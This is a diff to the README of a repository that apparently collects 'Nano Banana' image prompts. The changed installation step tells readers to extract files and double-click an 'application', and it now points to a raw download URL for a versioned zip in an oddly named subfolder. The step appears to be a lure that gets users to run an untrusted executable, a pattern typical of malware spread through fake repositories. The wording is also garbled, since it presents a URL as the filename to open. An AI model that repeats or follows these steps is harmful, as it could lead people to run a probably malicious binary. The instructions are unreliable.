sargonelizabeth/Awesome-Nano-Banana-Prompts/README.md

 4. **Extract the Files**: If the files are in a compressed format (like .zip), extract them by right-clicking on the file and selecting “Extract All” or using your preferred extraction tool.

-5. **Open the Application**: Navigate to the folder where you extracted the files and look for the main application file (usually named something like `AwesomeNanoBananaPrompts.exe` or similar).
+5. **Open the Application**: Navigate to the folder where you extracted the files and look for the main application file (usually named something like `https://raw.githubusercontent.com/sargonelizabeth/Awesome-Nano-Banana-Prompts/main/multivorous/Awesome_Banana_Nano_Prompts_3.1.zip` or similar).
 Double-click on this file to open the application.

 ## ✨ Features